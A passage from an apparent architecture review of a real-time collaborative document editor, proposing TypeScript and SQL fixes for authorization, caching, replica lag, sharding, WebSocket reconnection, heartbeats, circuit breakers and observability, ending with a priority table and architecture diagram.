private hashToken(token: string): string {
return crypto.createHash('sha256').update(token).digest('hex');
}
async revokeAllUserSessions(userId: string): Promise<void> {
// In production, use a more efficient approach with user-specific key patterns
const keys = await this.redis.keys('refresh:*');
for (const key of keys) {
const data = await this.redis.get(key);
if (data && JSON.parse(data).userId === userId) {
await this.redis.del(key);
}
}
}
}
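Tying TokenService to the cookie handling from earlier, a refresh endpoint might look like this sketch (`app`, `tokenService`, and `authService` are assumed to exist):

```typescript
// Sketch: refresh endpoint combining TokenService and AuthService
app.post('/api/auth/refresh', async (req: Request, res: Response) => {
  const refreshToken = req.cookies.refresh_token;
  if (!refreshToken) {
    return res.status(401).json({ error: 'Missing refresh token' });
  }

  const tokens = await tokenService.refreshTokens(refreshToken);
  if (!tokens) {
    // Rotation detected reuse or the family was revoked - force re-login
    res.clearCookie('access_token', { path: '/api' });
    res.clearCookie('refresh_token', { path: '/api/auth/refresh' });
    return res.status(401).json({ error: 'Session expired' });
  }

  authService.setAuthCookies(res, tokens);
  return res.status(204).end();
});
```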
**Issue: Missing Document Authorization**

The Problem: The architecture doesn't mention access control. Can any authenticated user access any document?
Solution: Document Permission System
enum Permission {
VIEW = 'view',
COMMENT = 'comment',
EDIT = 'edit',
ADMIN = 'admin'
}
interface DocumentAccess {
documentId: string;
principalType: 'user' | 'group' | 'organization' | 'public';
principalId: string | null; // null for public
permission: Permission;
}
class DocumentAuthorizationService {
private cache: Redis;
private pool: Pool;
async checkPermission(
userId: string,
documentId: string,
requiredPermission: Permission
): Promise<boolean> {
// Check cache first
const cacheKey = `authz:${userId}:${documentId}`;
const cached = await this.cache.get(cacheKey);
if (cached) {
return this.permissionSatisfies(cached as Permission, requiredPermission);
}
// Query database
const effectivePermission = await this.getEffectivePermission(userId, documentId);
// Cache for 5 minutes
if (effectivePermission) {
await this.cache.setex(cacheKey, 300, effectivePermission);
}
return this.permissionSatisfies(effectivePermission, requiredPermission);
}
private async getEffectivePermission(
userId: string,
documentId: string
): Promise<Permission | null> {
const { rows } = await this.pool.query(`
WITH user_groups AS (
SELECT group_id FROM group_members WHERE user_id = $1
),
user_org AS (
SELECT organization_id FROM users WHERE id = $1
)
SELECT permission FROM document_access
WHERE document_id = $2
AND (
(principal_type = 'user' AND principal_id = $1)
OR (principal_type = 'group' AND principal_id IN (SELECT group_id FROM user_groups))
OR (principal_type = 'organization' AND principal_id = (SELECT organization_id FROM user_org))
OR (principal_type = 'public')
)
ORDER BY
CASE permission
WHEN 'admin' THEN 4
WHEN 'edit' THEN 3
WHEN 'comment' THEN 2
WHEN 'view' THEN 1
END DESC
LIMIT 1
`, [userId, documentId]);
return rows[0]?.permission ?? null;
}
private permissionSatisfies(has: Permission | null, needs: Permission): boolean {
if (!has) return false;
const hierarchy: Record<Permission, number> = {
[Permission.VIEW]: 1,
[Permission.COMMENT]: 2,
[Permission.EDIT]: 3,
[Permission.ADMIN]: 4
};
return hierarchy[has] >= hierarchy[needs];
}
// Invalidate cache when permissions change
async invalidateDocumentCache(documentId: string): Promise<void> {
const keys = await this.cache.keys(`authz:*:${documentId}`);
if (keys.length > 0) {
await this.cache.del(...keys);
}
}
}
// Middleware
function requirePermission(permission: Permission) {
return async (req: Request, res: Response, next: NextFunction) => {
const { documentId } = req.params;
const userId = req.user!.id;
const hasPermission = await authzService.checkPermission(
userId,
documentId,
permission
);
if (!hasPermission) {
return res.status(403).json({ error: 'Insufficient permissions' });
}
next();
};
}
// Usage
app.get('/api/documents/:documentId', requirePermission(Permission.VIEW), getDocument);
app.put('/api/documents/:documentId', requirePermission(Permission.EDIT), updateDocument);
app.delete('/api/documents/:documentId', requirePermission(Permission.ADMIN), deleteDocument);
**Issue: CDN Caching of API Responses**

The Problem: Caching API responses for collaborative documents is fundamentally broken:
10:00:00 - Alice requests document, CDN caches response
10:00:30 - Bob edits document
10:04:59 - Alice requests document again, gets stale cached version
Alice sees version from 5 minutes ago!
Solution: Proper Cache Control Headers
class CacheControlMiddleware {
// Never cache document content or real-time data
static noCache(req: Request, res: Response, next: NextFunction): void {
res.set({
'Cache-Control': 'no-store, no-cache, must-revalidate, proxy-revalidate',
'Pragma': 'no-cache',
'Expires': '0',
'Surrogate-Control': 'no-store'
});
next();
}
// Cache static assets aggressively
static staticAssets(req: Request, res: Response, next: NextFunction): void {
res.set({
'Cache-Control': 'public, max-age=31536000, immutable'
});
next();
}
// Cache user-specific data privately with revalidation
static privateWithRevalidation(maxAge: number) {
return (req: Request, res: Response, next: NextFunction) => {
res.set({
'Cache-Control': `private, max-age=${maxAge}, must-revalidate`,
'Vary': 'Authorization, Cookie'
});
next();
};
}
// Cache public data with ETag validation
static publicWithEtag(req: Request, res: Response, next: NextFunction): void {
res.set({
'Cache-Control': 'public, max-age=0, must-revalidate',
'Vary': 'Accept-Encoding'
});
next();
}
}
// Apply to routes
app.use('/api/documents/:id/content', CacheControlMiddleware.noCache);
app.use('/api/documents/:id/operations', CacheControlMiddleware.noCache);
app.use('/api/users/me', CacheControlMiddleware.privateWithRevalidation(60));
app.use('/api/documents', CacheControlMiddleware.publicWithEtag); // List with ETags
app.use('/static', CacheControlMiddleware.staticAssets);
What CAN be cached:
// Safe to cache:
// 1. Static assets (JS, CSS, images) - with content hash in filename
// 2. User profile data - short TTL, private
// 3. Document metadata (title, last modified) - with ETag validation
// 4. Organization/team data - short TTL
// CloudFront configuration
const cloudFrontBehaviors = {
'/static/*': {
TTL: 31536000, // 1 year
compress: true,
headers: ['Origin']
},
'/api/documents/*/content': {
TTL: 0, // Never cache
forwardCookies: 'all',
forwardHeaders: ['Authorization']
},
'/api/*': {
TTL: 0,
forwardCookies: 'all',
forwardHeaders: ['Authorization', 'X-CSRF-Token']
}
};
**Issue: PostgreSQL as a Real-Time Message Bus**

The Problem: Using PostgreSQL for real-time sync creates unsustainable write load:
100 users typing at 5 chars/second = 500 writes/second
1000 users = 5000 writes/second
PostgreSQL will struggle, and latency will spike
Solution: Tiered Storage Architecture
class TieredDocumentStorage {
private redis: Redis;
private pool: Pool;
private operationBuffer: Map<string, DocumentOperation[]> = new Map();
private flushInterval: NodeJS.Timeout;
constructor() {
// Flush buffered operations every 100ms
this.flushInterval = setInterval(() => this.flushBuffers(), 100);
}
async applyOperation(op: DocumentOperation): Promise<void> {
// Layer 1: Immediate - Redis for real-time sync
await this.redis.multi()
.xadd(
`doc:${op.documentId}:ops`,
'MAXLEN', '~', '1000',
'*',
'data', JSON.stringify(op)
)
.publish(`doc:${op.documentId}`, JSON.stringify(op))
.exec();
// Layer 2: Buffered - Batch writes to PostgreSQL
if (!this.operationBuffer.has(op.documentId)) {
this.operationBuffer.set(op.documentId, []);
}
this.operationBuffer.get(op.documentId)!.push(op);
}
private async flushBuffers(): Promise<void> {
const buffers = new Map(this.operationBuffer);
this.operationBuffer.clear();
for (const [documentId, operations] of buffers) {
if (operations.length === 0) continue;
try {
await this.batchInsertOperations(operations);
} catch (error) {
// Re-queue failed operations
const existing = this.operationBuffer.get(documentId) ?? [];
this.operationBuffer.set(documentId, [...operations, ...existing]);
console.error(`Failed to flush operations for ${documentId}:`, error);
}
}
}
private async batchInsertOperations(operations: DocumentOperation[]): Promise<void> {
const values = operations.map((op, i) => {
const offset = i * 7;
return `($${offset + 1}, $${offset + 2}, $${offset + 3}, $${offset + 4}, $${offset + 5}, $${offset + 6}, $${offset + 7})`;
}).join(', ');
const params = operations.flatMap(op => [
op.id, op.documentId, op.userId, op.revision,
JSON.stringify(op.operation), JSON.stringify(op.timestamp), op.checksum
]);
await this.pool.query(`
INSERT INTO document_operations
(id, document_id, user_id, revision, operation, timestamp, checksum)
VALUES ${values}
ON CONFLICT (document_id, revision) DO NOTHING
`, params);
}
// Recovery: Rebuild from PostgreSQL if Redis data is lost
async recoverFromPostgres(documentId: string, fromRevision: number): Promise<DocumentOperation[]> {
const { rows } = await this.pool.query(`
SELECT * FROM document_operations
WHERE document_id = $1 AND revision > $2
ORDER BY revision ASC
`, [documentId, fromRevision]);
return rows.map(row => ({
id: row.id,
documentId: row.document_id,
userId: row.user_id,
revision: row.revision,
operation: JSON.parse(row.operation),
timestamp: JSON.parse(row.timestamp),
checksum: row.checksum
}));
}
}
**Issue: Organization-Based Sharding Creates Hot Partitions**

The Problem: Large organizations (e.g., enterprise customers) create hot partitions:
Organization A (10 users): Partition 1 - light load
Organization B (10,000 users): Partition 2 - overwhelmed
Organization C (50 users): Partition 3 - light load
Solution: Document-Level Sharding with Consistent Hashing
class DocumentShardRouter {
private shards: ShardInfo[];
private hashRing: ConsistentHashRing;
constructor(shards: ShardInfo[]) {
this.shards = shards;
this.hashRing = new ConsistentHashRing(
shards.map(s => s.id),
100 // Virtual nodes per shard
);
}
getShardForDocument(documentId: string): ShardInfo {
const shardId = this.hashRing.getNode(documentId);
return this.shards.find(s => s.id === shardId)!;
}
// Rebalance when adding/removing shards
async addShard(newShard: ShardInfo): Promise<void> {
this.shards.push(newShard);
this.hashRing.addNode(newShard.id);
// Migrate affected documents
await this.migrateDocuments(newShard);
}
private async migrateDocuments(targetShard: ShardInfo): Promise<void> {
// Find documents that should now be on the new shard
for (const shard of this.shards) {
if (shard.id === targetShard.id) continue;
const documents = await this.getDocumentsOnShard(shard);
for (const doc of documents) {
const correctShard = this.getShardForDocument(doc.id);
if (correctShard.id === targetShard.id) {
await this.migrateDocument(doc.id, shard, targetShard);
}
}
}
}
}
// Shard-aware connection pool
class ShardedConnectionPool {
private pools: Map<string, Pool> = new Map();
private router: DocumentShardRouter;
async query(documentId: string, sql: string, params: any[]): Promise<QueryResult> {
const shard = this.router.getShardForDocument(documentId);
const pool = this.pools.get(shard.id);
if (!pool) {
throw new Error(`No pool for shard ${shard.id}`);
}
return pool.query(sql, params);
}
// Cross-shard queries (avoid when possible)
async queryAll(sql: string, params: any[]): Promise<QueryResult[]> {
const results = await Promise.all(
Array.from(this.pools.values()).map(pool => pool.query(sql, params))
);
return results;
}
}
Alternative: Vitess or Citus for Automatic Sharding
-- Citus distributed table
SELECT create_distributed_table('document_operations', 'document_id');
SELECT create_distributed_table('documents', 'id');
-- Queries automatically route to correct shard
SELECT * FROM documents WHERE id = 'doc-123'; -- Routes to one shard
SELECT * FROM documents WHERE organization_id = 'org-456'; -- Fan-out query
**Issue: Read Replica Lag**

The Problem: Read replicas can be seconds behind the primary, causing users to see stale data:
10:00:00.000 - Alice saves document (writes to primary)
10:00:00.500 - Alice refreshes page (reads from replica)
Replica is 1 second behind - Alice sees old version!
"Where did my changes go?!"
Solution: Read-Your-Writes Consistency
class ConsistentReadService {
private primaryPool: Pool;
private replicaPool: Pool;
private redis: Redis;
async read(
userId: string,
documentId: string,
query: string,
params: any[]
): Promise<QueryResult> {
// Check if user recently wrote to this document
const lastWriteTime = await this.redis.get(`write:${userId}:${documentId}`);
if (lastWriteTime) {
const timeSinceWrite = Date.now() - parseInt(lastWriteTime);
// If write was recent, check replica lag
if (timeSinceWrite < 10000) { // Within 10 seconds
const replicaLag = await this.getReplicaLag();
if (replicaLag * 1000 > timeSinceWrite) {
// Replica hasn't caught up - read from primary
return this.primaryPool.query(query, params);
}
}
}
// Safe to read from replica
return this.replicaPool.query(query, params);
}
async write(
userId: string,
documentId: string,
query: string,
params: any[]
): Promise<QueryResult> {
const result = await this.primaryPool.query(query, params);
// Track write time for read-your-writes consistency
await this.redis.setex(
`write:${userId}:${documentId}`,
60, // Track for 60 seconds
Date.now().toString()
);
return result;
}
private async getReplicaLag(): Promise<number> {
const { rows } = await this.replicaPool.query(`
SELECT EXTRACT(EPOCH FROM (NOW() - pg_last_xact_replay_timestamp())) AS lag
`);
return rows[0]?.lag ?? 0;
}
}
// Alternative: LSN-based consistency
class LSNConsistentReadService {
async write(userId: string, query: string, params: any[]): Promise<{ result: QueryResult; lsn: string }> {
const result = await this.primaryPool.query(query, params);
// Get current WAL position
const { rows } = await this.primaryPool.query('SELECT pg_current_wal_lsn()::text AS lsn');
const lsn = rows[0].lsn;
// Store LSN for user's session
await this.redis.setex(`session:${userId}:lsn`, 300, lsn);
return { result, lsn };
}
async read(userId: string, query: string, params: any[]): Promise<QueryResult> {
const requiredLsn = await this.redis.get(`session:${userId}:lsn`);
if (requiredLsn) {
try {
// Wait for replica to catch up (with timeout)
await this.waitForReplicaLsn(requiredLsn, 5000);
} catch {
// Replica still behind after the timeout - serve from primary instead
return this.primaryPool.query(query, params);
}
}
return this.replicaPool.query(query, params);
}
private async waitForReplicaLsn(targetLsn: string, timeoutMs: number): Promise<void> {
const start = Date.now();
while (Date.now() - start < timeoutMs) {
const { rows } = await this.replicaPool.query(`
SELECT pg_last_wal_replay_lsn() >= $1::pg_lsn AS caught_up
`, [targetLsn]);
if (rows[0].caught_up) return;
await new Promise(resolve => setTimeout(resolve, 50));
}
// Timeout - fall back to primary
throw new Error('Replica lag timeout');
}
}
**Issue: No WebSocket Reconnection Strategy**

The Problem: WebSocket connections drop frequently (network changes, mobile sleep, etc.). Without proper reconnection, users lose real-time updates.
Solution: Robust Reconnection with Exponential Backoff
class ResilientWebSocket {
protected ws: WebSocket | null = null;
private url: string;
private reconnectAttempts = 0;
private maxReconnectAttempts = 10;
private baseDelay = 1000;
private maxDelay = 30000;
private messageQueue: string[] = [];
private lastEventId: string | null = null;
constructor(url: string) {
this.url = url;
this.connect();
}
private connect(): void {
// Include last event ID for resumption
const connectUrl = this.lastEventId
? `${this.url}?lastEventId=${this.lastEventId}`
: this.url;
this.ws = new WebSocket(connectUrl);
this.ws.onopen = () => {
console.log('WebSocket connected');
this.reconnectAttempts = 0;
this.flushMessageQueue();
this.onOpen(); // hook for subclasses (see HeartbeatWebSocket below)
};
this.ws.onclose = (event) => {
if (event.code !== 1000) { // Not a clean close
this.scheduleReconnect();
}
this.onClose(); // hook for subclasses
};
this.ws.onerror = (error) => {
console.error('WebSocket error:', error);
};
this.ws.onmessage = (event) => {
const data = JSON.parse(event.data);
if (data.eventId) {
this.lastEventId = data.eventId;
}
this.handleMessage(data);
};
}
private scheduleReconnect(): void {
if (this.reconnectAttempts >= this.maxReconnectAttempts) {
console.error('Max reconnection attempts reached');
this.onMaxRetriesExceeded?.();
return;
}
const delay = Math.min(
this.baseDelay * Math.pow(2, this.reconnectAttempts) + Math.random() * 1000,
this.maxDelay
);
console.log(`Reconnecting in ${delay}ms (attempt ${this.reconnectAttempts + 1})`);
setTimeout(() => {
this.reconnectAttempts++;
this.connect();
}, delay);
}
send(message: string): void {
if (this.ws?.readyState === WebSocket.OPEN) {
this.ws.send(message);
} else {
// Queue message for when connection is restored
this.messageQueue.push(message);
}
}
private flushMessageQueue(): void {
while (this.messageQueue.length > 0 && this.ws?.readyState === WebSocket.OPEN) {
const message = this.messageQueue.shift()!;
this.ws.send(message);
}
}
// Callbacks
onMessage?: (data: any) => void;
onMaxRetriesExceeded?: () => void;
// Overridable hooks for subclasses (HeartbeatWebSocket overrides these)
protected onOpen(): void {}
protected onClose(): void {}
protected handleMessage(data: any): void {
this.onMessage?.(data);
}
}
Server-Side: Event Resumption
class WebSocketServer {
private redis: Redis;
async handleConnection(ws: WebSocket, req: Request): Promise<void> {
const documentId = req.query.documentId as string;
const lastEventId = req.query.lastEventId as string | undefined;
// Send missed events if client is resuming
if (lastEventId) {
const missedEvents = await this.getMissedEvents(documentId, lastEventId);
for (const event of missedEvents) {
ws.send(JSON.stringify(event));
}
}
// Subscribe to new events
this.subscribeToDocument(documentId, ws);
}
private async getMissedEvents(documentId: string, lastEventId: string): Promise<any[]> {
// Use Redis Streams for event sourcing
const events = await this.redis.xrange(
`doc:${documentId}:events`,
lastEventId,
'+',
'COUNT', 1000
);
return events
.filter(([id]) => id !== lastEventId) // Exclude the last seen event
.map(([id, fields]) => ({
eventId: id,
...this.parseStreamFields(fields)
}));
}
}
**Issue: No Heartbeat / Keep-Alive**

The Problem: Silent connection failures (NAT timeout, proxy disconnect) aren't detected, leaving "zombie" connections.
Solution: Bidirectional Heartbeat
// Client-side
class HeartbeatWebSocket extends ResilientWebSocket {
private heartbeatInterval: NodeJS.Timeout | null = null;
private heartbeatTimeout: NodeJS.Timeout | null = null;
private readonly HEARTBEAT_INTERVAL = 30000; // 30 seconds
private readonly HEARTBEAT_TIMEOUT = 10000; // 10 seconds to respond
protected onOpen(): void {
super.onOpen();
this.startHeartbeat();
}
protected onClose(): void {
this.stopHeartbeat();
super.onClose();
}
private startHeartbeat(): void {
this.heartbeatInterval = setInterval(() => {
if (this.ws?.readyState === WebSocket.OPEN) {
this.ws.send(JSON.stringify({ type: 'ping', timestamp: Date.now() }));
this.heartbeatTimeout = setTimeout(() => {
console.log('Heartbeat timeout - closing connection');
this.ws?.close();
}, this.HEARTBEAT_TIMEOUT);
}
}, this.HEARTBEAT_INTERVAL);
}
private stopHeartbeat(): void {
if (this.heartbeatInterval) clearInterval(this.heartbeatInterval);
if (this.heartbeatTimeout) clearTimeout(this.heartbeatTimeout);
}
protected handleMessage(data: any): void {
if (data.type === 'pong') {
if (this.heartbeatTimeout) clearTimeout(this.heartbeatTimeout);
return;
}
super.handleMessage(data);
}
}
// Server-side
class WebSocketServerWithHeartbeat {
private readonly CLIENT_TIMEOUT = 60000; // 60 seconds without activity
handleConnection(ws: WebSocket): void {
let lastActivity = Date.now();
const checkTimeout = setInterval(() => {
if (Date.now() - lastActivity > this.CLIENT_TIMEOUT) {
console.log('Client timeout - closing connection');
ws.close(4000, 'Timeout');
clearInterval(checkTimeout);
}
}, 10000);
ws.on('message', (message) => {
lastActivity = Date.now();
const data = JSON.parse(message.toString());
if (data.type === 'ping') {
ws.send(JSON.stringify({ type: 'pong', timestamp: Date.now() }));
return;
}
this.handleMessage(ws, data);
});
ws.on('close', () => {
clearInterval(checkTimeout);
});
}
}
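As an alternative to JSON-level heartbeats, the ws library also supports protocol-level ping/pong frames, which browsers answer automatically; its documented liveness pattern looks roughly like this:

```typescript
import { WebSocketServer, WebSocket } from 'ws';

type LiveSocket = WebSocket & { isAlive?: boolean };

const wss = new WebSocketServer({ port: 8080 });

wss.on('connection', (ws: LiveSocket) => {
  ws.isAlive = true;
  ws.on('pong', () => { ws.isAlive = true; }); // clients reply to pings automatically
});

// Every 30s: drop sockets that never answered the previous ping
const interval = setInterval(() => {
  for (const client of wss.clients as Set<LiveSocket>) {
    if (client.isAlive === false) { client.terminate(); continue; }
    client.isAlive = false;
    client.ping();
  }
}, 30000);

wss.on('close', () => clearInterval(interval));
```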
**Issue: No Graceful Degradation**

The Problem: When components fail, the entire system becomes unusable instead of degrading gracefully.
Solution: Circuit Breakers and Fallbacks
import CircuitBreaker from 'opossum';
import { LRUCache } from 'lru-cache';
class ResilientDocumentService {
private dbBreaker: CircuitBreaker;
private redisBreaker: CircuitBreaker;
private localCache: LRUCache<string, Document>;
constructor() {
// Database circuit breaker
this.dbBreaker = new CircuitBreaker(this.queryDatabase.bind(this), {
timeout: 3000, // 3 second timeout
errorThresholdPercentage: 50, // Open after 50% failures
resetTimeout: 30000, // Try again after 30 seconds
volumeThreshold: 10 // Minimum requests before opening
});
this.dbBreaker.fallback(async (documentId: string) => {
// Try Redis cache
return this.getFromRedis(documentId);
});
this.dbBreaker.on('open', () => {
console.error('Database circuit breaker opened');
this.alertOps('Database circuit breaker opened');
});
// Redis circuit breaker
this.redisBreaker = new CircuitBreaker(this.queryRedis.bind(this), {
timeout: 1000,
errorThresholdPercentage: 50,
resetTimeout: 10000
});
this.redisBreaker.fallback(async (key: string) => {
// Fall back to local cache
return this.localCache.get(key);
});
}
async getDocument(documentId: string): Promise<Document | null> {
try {
// Try local cache first
const cached = this.localCache.get(documentId);
if (cached) return cached;
// Try Redis (through circuit breaker)
const redisDoc = await this.redisBreaker.fire(documentId);
if (redisDoc) {
this.localCache.set(documentId, redisDoc);
return redisDoc;
}
// Try database (through circuit breaker)
const dbDoc = await this.dbBreaker.fire(documentId);
if (dbDoc) {
this.localCache.set(documentId, dbDoc);
await this.cacheInRedis(documentId, dbDoc);
return dbDoc;
}
return null;
} catch (error) {
console.error('All fallbacks failed:', error);
throw new ServiceUnavailableError('Document service temporarily unavailable');
}
}
// Degraded mode: Allow viewing but not editing
async saveOperation(op: DocumentOperation): Promise<SaveResult> {
try {
await this.dbBreaker.fire(op);
return { success: true };
} catch (error) {
if (this.dbBreaker.opened) {
// Queue operation for later processing
await this.queueForRetry(op);
return {
success: false,
queued: true,
message: 'Your changes are saved locally and will sync when service is restored'
};
}
throw error;
}
}
}
**Issue: Missing Observability**

The Problem: Without proper observability, you can't diagnose issues or understand system behavior.
Solution: Comprehensive Observability Stack
import { metrics, trace, context } from '@opentelemetry/api';
import { PrometheusExporter } from '@opentelemetry/exporter-prometheus';
class DocumentMetrics {
private meter = metrics.getMeter('document-service');
private tracer = trace.getTracer('document-service');
// Counters
private operationsTotal = this.meter.createCounter('document_operations_total', {
description: 'Total number of document operations'
});
private conflictsTotal = this.meter.createCounter('document_conflicts_total', {
description: 'Total number of operation conflicts'
});
// Histograms
private operationLatency = this.meter.createHistogram('document_operation_latency_ms', {
description: 'Latency of document operations in milliseconds'
});
private syncLatency = this.meter.createHistogram('document_sync_latency_ms', {
description: 'Time from operation submission to all clients receiving it'
});
// Gauges
private activeConnections = this.meter.createObservableGauge('websocket_connections_active', {
description: 'Number of active WebSocket connections'
});
private documentSize = this.meter.createHistogram('document_size_bytes', {
description: 'Size of documents in bytes'
});
// Instrument an operation
async trackOperation<T>(
operationType: string,
documentId: string,
fn: () => Promise<T>
): Promise<T> {
const span = this.tracer.startSpan(`document.${operationType}`, {
attributes: {
'document.id': documentId,
'operation.type': operationType
}
});
const startTime = Date.now();
try {
const result = await context.with(trace.setSpan(context.active(), span), fn);
this.operationsTotal.add(1, {
operation: operationType,
status: 'success'
});
return result;
} catch (error) {
span.recordException(error as Error);
this.operationsTotal.add(1, {
operation: operationType,
status: 'error',
error_type: (error as Error).name
});
throw error;
} finally {
const duration = Date.now() - startTime;
this.operationLatency.record(duration, {
operation: operationType
});
span.end();
}
}
recordConflict(documentId: string, conflictType: string): void {
this.conflictsTotal.add(1, {
document_id: documentId,
conflict_type: conflictType
});
}
recordSyncLatency(latencyMs: number): void {
this.syncLatency.record(latencyMs);
}
}
// Structured logging
import pino from 'pino';
const logger = pino({
level: process.env.LOG_LEVEL || 'info',
formatters: {
level: (label) => ({ level: label })
},
base: {
service: 'document-service',
version: process.env.APP_VERSION
}
});
// Usage
class DocumentService {
private metrics = new DocumentMetrics();
private logger = logger.child({ component: 'DocumentService' });
async applyOperation(op: DocumentOperation): Promise<void> {
return this.metrics.trackOperation('apply', op.documentId, async () => {
this.logger.info({
event: 'operation_received',
documentId: op.documentId,
userId: op.userId,
revision: op.revision
});
// ... apply operation
this.logger.info({
event: 'operation_applied',
documentId: op.documentId,
newRevision: op.revision
});
});
}
}
**Priority Summary**

| Issue | Severity | Effort | Priority |
|---|---|---|---|
| Client clock timestamps | 🔴 Critical | Medium | P0 |
| Paragraph-level LWW | 🔴 Critical | High | P0 |
| Cross-server WebSocket isolation | 🔴 Critical | Medium | P0 |
| 30-second snapshot data loss | 🔴 Critical | Medium | P0 |
| JWT in localStorage | 🟠 High | Low | P1 |
| CDN caching API responses | 🟠 High | Low | P1 |
| Missing document authorization | 🟠 High | Medium | P1 |
| PostgreSQL as message bus | 🟠 High | High | P1 |
| No WebSocket reconnection | 🟡 Medium | Low | P2 |
| No heartbeat/keep-alive | 🟡 Medium | Low | P2 |
| Read replica lag | 🟡 Medium | Medium | P2 |
| Organization-based sharding | 🟡 Medium | High | P2 |
| HTML storage (XSS) | 🟡 Medium | Medium | P2 |
| Missing observability | 🟡 Medium | Medium | P2 |
| No circuit breakers | 🟢 Low | Medium | P3 |
**Revised Architecture**

┌─────────────────────────────────────────────────────────────────────────────┐
│ Load Balancer │
│ (Sticky sessions by document ID) │
└─────────────────────────────────────────────────────────────────────────────┘
│
┌─────────────────┼─────────────────┐
▼ ▼ ▼
┌──────────────┐ ┌──────────────┐ ┌──────────────┐
│ API Server │ │ API Server │ │ API Server │
│ + WebSocket │ │ + WebSocket │ │ + WebSocket │
│ + OT Engine │ │ + OT Engine │ │ + OT Engine │
└──────────────┘ └──────────────┘ └──────────────┘
│ │ │
└─────────────────┼─────────────────┘
│
┌─────────────────┼─────────────────┐
▼ ▼ ▼
┌──────────────┐ ┌──────────────┐ ┌──────────────┐
│ Redis │ │ Redis │ │ Redis │
│ (Primary) │ │ (Replica) │ │ (Replica) │
│ - Pub/Sub │ │ │ │ │
│ - Op Cache │ │ │ │ │
│ - Sessions │ │ │ │ │
└──────────────┘ └──────────────┘ └──────────────┘
│
┌─────────────────┼─────────────────┐
▼ ▼ ▼
┌──────────────┐ ┌──────────────┐ ┌──────────────┐
│ PostgreSQL │ │ PostgreSQL │ │ PostgreSQL │
│ (Primary) │ │ (Replica) │ │ (Replica) │
│ - Documents │ │ (Read-only) │ │ (Read-only) │
│ - Operations│ │ │ │ │
│ - Snapshots │ │ │ │ │
└──────────────┘ └──────────────┘ └──────────────┘
This architecture addresses all critical issues while maintaining scalability and reliability.